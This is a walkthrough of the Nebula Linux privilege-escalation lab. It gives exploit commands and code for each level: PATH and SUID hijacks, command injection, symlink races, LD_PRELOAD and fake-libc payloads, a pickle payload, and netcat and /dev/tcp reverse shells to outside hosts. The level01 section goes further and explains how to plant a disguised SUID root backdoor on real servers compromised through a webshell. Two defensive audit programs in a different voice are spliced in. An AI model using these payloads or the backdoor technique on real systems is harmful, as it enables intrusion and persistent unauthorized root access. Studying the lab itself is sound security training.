Learning the Nebula system
0xff About Nebula
Nebula takes the participant through a variety of common (and less than common) weaknesses and vulnerabilities in Linux. It takes a look at
SUID files
Permissions
Race conditions
Shell meta-variables
$PATH weaknesses
Scripting language weaknesses
Binary compilation failures
At the end of Nebula, the user will have a reasonably thorough understanding of local attacks against Linux systems, and a cursory look at some of the remote attacks that are possible.
official website: https://exploit-exercises.com/nebula/
nebula.iso download: https://pan.baidu.com/s/1dFdRIm9
some writeups:
google-->cache:https://lightless.me/archives/Nebula-writeup.html
or
https://pan.baidu.com/s/1mhQgqCg
or
https://github.com/join-us/exploit-exercises/blob/master/Nebula/level11.md
0x00 level00
mykey:
su - level00
pass:level00
find / -type f -perm -4000 -ls > tmp.txt
link knowledge:
Detailed explanation of suid, sgid and sticky in Linux: https://crazyming.blog.51cto.com/1048571/467414
find / -type f -perm -4000 -ls > tmp.txt (function: find SUID files)
find / -type f -perm -4000 -ls | grep "flag00" > tmp.txt (function: find SUID files whose path contains flag00)
find / -type f -perm -2000 -ls > tmp.txt (function: find SGID files)
find / -perm -2 -type f -print (function: find files writable by everyone)
echo "/bin/cp /bin/sh /tmp/.sh;chmod 4755 /tmp/.sh" >> writeable_file_if_it_is_from_any_autorun_directory
/tmp/.sh -p (run this to get a shell with euid=root)
0x01 level01
mykey:
su - level01
password:level01
PATH=/tmp:$PATH;export PATH;echo $PATH
vi /tmp/echo
-----content-----
/bin/sh
------end--------
chmod +x /tmp/echo
cd /home/flag01
./flag01
getflag
link knowledge:
the source code of /home/flag01/flag01 is:
------------content of source.c------------
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
    gid_t gid;
    uid_t uid;

    gid = getegid();
    uid = geteuid();

    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    /* "echo" is resolved through the caller's $PATH: this is the weakness */
    system("/usr/bin/env echo and now what?");
}
------------end----------------------------
When I tried to execute the commands in "mykey" above but without "chmod +x /tmp/echo", I found that executing /home/flag01/flag01 did not return a shell with suid=flag01; after I added chmod +x /tmp/echo, it succeeded.
ls -l /home/flag01 --> -rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01
This means file flag01's owner is user flag01 and its group is level01, and the setuid bit is set, so when another user such as level01 runs it, they get the privileges of the file's owner (user flag01).
which getflag-->/bin/getflag
ls -l /bin/getflag--> -rwxr-xr-x 1 root root 7311 2011-11-23 14:51 /bin/getflag
Then execute the "mykey" commands above to pass level01. /bin/getflag is a program that checks whether the user executing it belongs to a "flag account"; when a "non-flag account" such as level01 tries to execute /bin/getflag, it returns: "getflag is executing on a non-flag account, this doesn't count".
However, when I first didn't add "chmod +x /tmp/echo" in "mykey", I thought there might be some error in level01, and tried to change the source code of /home/flag01/flag01 into file.c:
------------content of file.c--------------
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
    gid_t gid;
    uid_t uid;

    gid = getegid();
    uid = geteuid();

    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    system("/usr/bin/env echo && echo runtime error.");
}
------------end------------------------
That is, change the final system() call from "system("/usr/bin/env echo and now what?");" to "system("/usr/bin/env echo && echo runtime error.");", and this could be a "works well backdoor" once you have a root shell on a system:
to use this file.c as a root shell backdoor after getting a root shell,
execute as root:
gcc -o 1 file.c
mv 1 /bin/l2ping
chmod 4755 /bin/l2ping (or as a common user: sudo chown root /bin/l2ping; sudo chmod +s /bin/l2ping)
then execute in the webshell:
PATH=/tmp:$PATH
export PATH
echo $PATH (to check that /tmp is in $PATH)
ln -s /bin/sh /tmp/echo
or: PATH=/tmp:$PATH;export PATH;echo $PATH;ln -s /bin/sh /tmp/echo
(later I found this will not get a root shell, because the new shell created this way [/tmp/echo-->/bin/sh] will not be displayed in the webshell's terminal)
then use the webshell to get a root-privilege shell:
/bin/l2ping
Both source.c and file.c can serve as a root-privilege backdoor shell; the difference between source.c and file.c is:
with source.c we must execute "chmod +x /tmp/echo"
with file.c we must execute "ln -s /bin/sh /tmp/echo"
*attention*:
When I tried to keep root privilege in the webshell and conveniently execute commands in the webshell with root privilege (so that I don't have to use reGeorg, proxycap, putty and the two kinds of backdoor above to connect to the target victim PC and execute commands in a root shell; these steps are too slow for controlling the target server), I tried to use root privilege to execute:
chmod 4755 /..../..../webshell.php(eg.b374kshell)
browser visit --> https://xxx/xxx/xxx/webshell.php ---> terminal:
id
out: uid=48(apache) gid=48(apache) groups=48(apache)
Later I realized a webshell.php file with setuid=root will not execute with root privilege, because only executable files like ELF and *.sh files execute with root privilege; *.php files are not in that scope, so my webshell's terminal has apache's privilege, not root. I could chmod 4755 apache to get root privilege in webshell.php, but that is not wise.
!!!cool thing:
One sentence to keep a root shell in the webshell (a strong webshell is better, like b374k; chopper may be stopped from executing a normal command when there is some WAF). Use the webshell's terminal function to execute:
PATH=/tmp:$PATH;export PATH;echo $PATH;/bin/echo "whoami" > /tmp/.out;rm /tmp/echo;ln -s /tmp/.out /tmp/echo;chmod +x /tmp/.out;/bin/l2ping > /tmp/.out1;cat /tmp/.out1;rm /tmp/.out1
This means the program (a file with setuid=root) is executed with apache's privilege, but it runs commands with root privilege; change "whoami" to any command to execute it with root privilege.
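The level01 weakness is that a setuid binary calls system("/usr/bin/env echo ..."), so "echo" is resolved through whatever $PATH the caller exported; the real fix is to exec /bin/echo by absolute path with a fixed environment. As an added example (not Nebula's code; the function names and the sample PATH are my own), this C check rejects a PATH that contains entries an unprivileged user could write to, the kind of guard a privileged program or a host audit can apply:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

/* A PATH directory is untrusted for privileged code if it is relative (an empty
 * entry means "current directory"), missing, not a directory, not owned by root,
 * or writable by everyone. /tmp fails the last test even with its sticky bit:
 * anyone can still create /tmp/echo there, which is what the level01 walkthrough does. */
int dir_is_untrusted(const char *dir)
{
    struct stat st;
    if (dir[0] != '/') return 1;
    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode)) return 1;
    if (st.st_uid != 0 || (st.st_mode & S_IWOTH)) return 1;
    return 0;
}

/* Walk a colon-separated PATH by hand: strtok() would drop the empty entries
 * that matter most. Returns the number of untrusted entries and copies the
 * first offender into `first` (when non-NULL). */
int count_untrusted_path_entries(const char *path, char *first, size_t firstlen)
{
    const char *p = path;
    int bad = 0;
    for (;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        char entry[4096];
        if (len >= sizeof entry) len = sizeof entry - 1;
        memcpy(entry, p, len);
        entry[len] = '\0';
        if (dir_is_untrusted(entry) && bad++ == 0 && first)
            snprintf(first, firstlen, "%s", entry);
        if (!colon) break;
        p = colon + 1;
    }
    return bad;
}

int main(void)
{
    /* Constructed input: the PATH the level01 walkthrough exports before running flag01. */
    const char *attack_path = "/tmp:/usr/local/bin:/usr/bin:/bin";
    char first[4096];
    int bad = count_untrusted_path_entries(attack_path, first, sizeof first);
    printf("%d untrusted PATH entries (first: %s)\n", bad, bad ? first : "none");
    return bad ? 1 : 0;
}
```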
0x02 level02
mykey:
su - level02
pass:level02
USER="nihao;sh"
./flag02
getflag
0x03 level03
mykey:
su - level03
pass:level03 (su - levelxx; pass:levelxx omitted from here on)
cd /home/flag03
vi writable.d/1.sh
---------content------
(id;getflag) > /tmp/tmp.txt
----------end---------
chmod +x writable.d/1.sh
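In level03 a cron job runs, as flag03, every script in /home/flag03/writable.d, and that directory is writable by other users. Added example (not part of the walkthrough; function names and the command-line usage are my own): a C audit that reports the entries of a job directory that the job's owner does not fully control, which is the check an administrator wants on any directory a scheduled task executes from:

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Why a file a scheduled job will execute is unsafe, or NULL if it looks fine.
 * expected_owner is the account the job runs as (flag03 in level03). */
const char *entry_risk(const struct stat *st, uid_t expected_owner)
{
    if (st->st_uid != expected_owner) return "owned by another user";
    if (st->st_mode & (S_IWGRP | S_IWOTH)) return "writable by group or others";
    return NULL;
}

/* Count risky entries in a job directory. The directory itself is checked first:
 * if anyone else can write to it (as with writable.d), they can drop a new script
 * into it, so every future run is already compromised. Returns -1 on error. */
int count_risky_entries(const char *dir, uid_t expected_owner)
{
    struct stat st;
    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode)) return -1;
    int risky = entry_risk(&st, expected_owner) ? 1 : 0;
    DIR *d = opendir(dir);
    if (!d) return -1;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        char path[4096];
        if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0) continue;
        snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        if (lstat(path, &st) != 0) { risky++; continue; }   /* unreadable: count it */
        const char *why = S_ISLNK(st.st_mode) ? "symlink (target can be swapped)" : entry_risk(&st, expected_owner);
        if (why) { printf("%s: %s\n", path, why); risky++; }
    }
    closedir(d);
    return risky;
}

int main(int argc, char **argv)
{
    /* Audit the directory given on the command line, e.g. /home/flag03/writable.d on Nebula. */
    const char *dir = argc > 1 ? argv[1] : ".";
    int n = count_risky_entries(dir, getuid());
    printf("%s: %d risky entries\n", dir, n);
    return n == 0 ? 0 : 1;
}
```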
0x04 level04
mykey:
cd /home/flag04
ln -s /home/flag04/token /tmp/level04
./flag04 /tmp/level04
0x05 level05
mykey:
cd /home/flag05
ls -la
cp ./backup/* /home/level05
cd /home/level05
tar zxvf backup[tab]
ls -la (a .ssh directory is now found in the home directory /home/level05)
ssh flag05@127.0.0.1
yes
getflag
0x06 level06
mykey:
vi /etc/passwd
v--> flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh --> :<,>w pass.txt
use john on kali2
john pass.txt
get flag06:hello
su - flag06
pass:hello
getflag
0x07 level07
mykey:
ctrl+alt+f2 --> tty2
tty2:nc -lnv 8888
ctrl+alt+f1 (back to tty1)
tty1:wget -O- "https://127.0.0.1:7007/index.cgi?Host=127.0.0 || mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 127.0.0.1 8888 1>/tmp/backpipe"
ctrl+alt+f2 --> tty2
tty2: id (flag07), getflag
link knowledge:
For security reasons, the netcat on the target Linux system may not support the -e parameter (nc -e ip port), so one way to get the shell back is:
mknod /tmp/backpipe p
/bin/bash 0</tmp/backpipe | nc 127.0.0.1 8888 1>/tmp/backpipe
0x08 level08
mykey:
scp level08@192.168.2.140:/home/flag08/capture.pcap /root/Desktop/
open /root/Desktop/capture.pcap in wireshark
in wireshark, select any TCP packet, right-click and choose Follow TCP Stream
find password: ...
use the hex dump view: the 0x7f bytes shown as "." are backspaces
su - flag08
pass:backd00Rmate
getflag
0x09 level09
mykey:
vi /tmp/level09.txt
----content----
[email {${system($use_me)}}]
-----end-------
cd /home/flag09
./flag09 /tmp/level09.txt getflag
0x10 level10
mykey:
vi /tmp/level10_1
----content------
#!/bin/sh
while true;
do
    ln -sf /tmp/level10_2 /tmp/level10_3
    ln -sf /home/flag10/token /tmp/level10_3
done
----end---------
touch /tmp/level10_2
touch /tmp/level10_3
chmod +x /tmp/level10_1
vi /tmp/level10_11
------content------
#!/bin/sh
while true;
do
    /home/flag10/flag10 /tmp/level10_3 192.168.2.140
done
-----end-----------
chmod +x /tmp/level10_3
use another terminal:
nc -lv 18211
use another terminal:
ssh level10@192.168.2.140
pass:level10
/tmp/level10_1
use another terminal:
ssh level10@192.168.2.140
pass:level10
/tmp/level10_11
find that the terminal running nc -lv 18211 received the content of token
su - flag10
pass:content of token
getflag
0x11 level11
mykey:
there are two ways:
(https://blackndoor.com/nebula-level11/)
(https://github.com/join-us/exploit-exercises/blob/master/Nebula/level11.md)
0x12 level12
mykey:
nc 127.0.0.1 50001
Pass:
test;getflag > /tmp/level12
vi /tmp/level12
0x13 level13
mykey:
vi /tmp/level13.c
-----content-------
#include <sys/types.h>

/* replacement getuid() for the copied (no longer setuid) flag13 binary */
uid_t getuid(void)
{
    return 1000;
}
-------------------
gcc -shared -fPIC /tmp/level13.c -o /tmp/level13.so
LD_PRELOAD="/tmp/level13.so"
export LD_PRELOAD
cp /home/flag13/flag13 /home/level13/
/home/level13/flag13
0x14 level14
mykey:
--------py--------
def main(string):
    length = len(string)
    out = ""
    for i in range(length):
        # walk the encrypted string from its last character backwards and
        # subtract each character's index; the result is therefore the
        # plaintext in reverse order
        #print type(chr(ord(string[length-1-i])-(length-1-i)))
        #print chr(ord(string[length-1-i])-(length-1-i))[0]
        out += chr(ord(string[length-1-i]) - (length-1-i))[0]
    return out

if __name__ == '__main__':
    import sys
    print(main(sys.argv[1]))
------------------
0x15 level15
cd /home/flag15
strace ./flag15
found this line: open("/var/tmp/flag15/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
vi /var/tmp/flag15/exploit.c
------------exploit.c-----------
#include <unistd.h>

/* flag15 looks for libc.so.6 in /var/tmp/flag15 first (see the strace line above),
 * so this file is built as a fake libc whose __libc_start_main runs getflag */
int __libc_start_main(int (*main)(int, char **, char **), int argc, char **ubp_av,
                      void (*init)(void), void (*fini)(void),
                      void (*rtld_fini)(void), void *stack_end)
{
    execl("/bin/getflag", "/bin/getflag", (char *)NULL);
    return 0;
}
--------------------------------
cd /var/tmp/flag15
gcc -g -fPIC -c exploit.c (-g is for gdb; -c produces an object file, not an executable)
ll
exploit.c
exploit.o
gcc exploit.o -shared -o libc.so.6
/home/flag15/flag15
relocation error: /var/tmp/flag15/libc.so.6: symbol __cxa_finalize, version GLIBC_2.1.3 not defined in file libc.so.6 with link time reference
vi verscript
---verscript-----
GLIBC_2.0{
global:__libc_start_main;
local: *;
};
-----------------
gcc -shared -Wl,--version-script,verscript,-Bstatic -static-libgcc -o libc.so.6 exploit.o
/home/flag15/flag15
0x16 level16
mykey:
vi /tmp/exp.sh
----content-----
/bin/getflag>>/tmp/level16.out
----------------
another terminal:
nc -lv 1616
origin terminal:
wget https://localhost:1616/index.cgi?username=%22%3C%2FDEV%2FNULL%3BP%3D%2FTMP%2FEXP.SH%3B%24{P%2C%2C}%3B%23&password=
urldecode: "</DEV/NULL;P=/TMP/EXP.SH;${P,,};#
0x17 level17
mykey:
vi /root/桌面/1.py
-----1.py-----
#!/usr/bin/python
import socket
HOST = '192.168.2.147'
PORT = 10007
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((HOST,PORT))
recv = sock.recv(1024)
print "Receive : %s\n" % recv
exploit = "cos\nsystem\n(S'/bin/bash -i>& /dev/tcp/192.168.3.106/51242 0>&1'\ntR.\n"
sock.send(exploit)
recv = sock.recv(2048)
-----end------
nc -lvp 51242
python /root/桌面/1.py
a new shell is received with ruid=flag17
>getflag
0x18 level18
mykey:
python -c 'print "login iii\r\n"*50+"closelog\r\n"+"shell\r\n"' | /home/flag18/flag18 --rcfile -d log -v -v -v
out:'Starting can not find'
... can not find
... can not find
cd /home/flag18
vi log
-----content------
Starting up. ......
something ....
------end---------
vi /tmp/Starting
----Starting---
/bin/getflag > /tmp/level18.out
-----end-------
*****attention:*****
do not forget to:
chmod +x /tmp/Starting
*******end*******
python -c 'print "login iii\r\n"*50+"closelog\r\n"+"shell\r\n"' | /home/flag18/flag18 --rcfile -d log -v -v -v
vi /tmp/level18.out
link knowledge:
https://v0ids3curity.blogspot.kr/2012/09/exploit-exercise-improper-file-handling.html
0x19 level19
mykey:
on kali(192.168.3.106)
vi /tmp/level19.c
------------level19.c-------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>

int main(void)
{
    pid_t pid;
    char *args[] = {"/bin/sh", "-c", "getflag > /tmp/level19.out", NULL};

    pid = fork();
    if (pid == 0)
    {
        /* child: lower its priority so the parent exits first and the
         * child is reparented to init (pid 1) before flag19 checks its parent */
        nice(19);
        execve("/home/flag19/flag19", args, NULL);
    }
    else if (pid < 0)
    {
        printf("Ups\n");
    }
    else
    {
        /* parent exits immediately */
        exit(1);
    }
    return 0;
}
--------------end---------------
gcc -o /tmp/level19 /tmp/level19.c
scp /tmp/level19 level19@192.168.2.147:/home/level19
ll (shows "x" on /home/level19/level19, so it could be executed)
ssh level19@192.168.2.147
pass:level19
cd /home/level19
./level19
out:binary can not be executed
back to kali(192.168.3.106)
scp /tmp/level19.c level19@192.168.2.147:/home/level19/
ssh level19@192.168.2.147
pass:level19
cd /home/level19
gcc -o level19-1 level19.c
chmod +x level19-1
./level19-1
vi /tmp/level19.out
succeeded
link knowledge:
https://www.cnblogs.com/bastard/archive/2012/08/31/2664896.html
https://www.cnblogs.com/mydomain/archive/2011/09/27/2193247.html